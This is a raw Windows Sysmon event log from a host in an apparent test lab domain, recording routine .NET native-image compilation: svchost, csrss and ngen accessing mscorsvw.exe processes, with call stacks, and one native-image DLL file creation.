13:46:32.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1F02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.172{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1F02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.172{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1F02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1E02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.141{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1E02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1E02-00000000A301}740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1D02-00000000A301}648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.047{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1D02-00000000A301}648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1D02-00000000A301}648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9138-6005-1C02-00000000A301}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:32.000{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9138-6005-1C02-00000000A301}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:32.000{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9138-6005-1C02-00000000A301}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:33.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.954{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:33.954{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2702-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2602-00000000A301}3392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.876{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2602-00000000A301}3392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.876{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2602-00000000A301}3392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:33.829{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bec-0\PresentationFramework-SystemData.dll2021-01-18 13:46:33.829 10341000x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.767{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:33.767{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2502-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.720{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9139-6005-2402-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.720{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9139-6005-2402-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:33.720{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9139-6005-2402-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
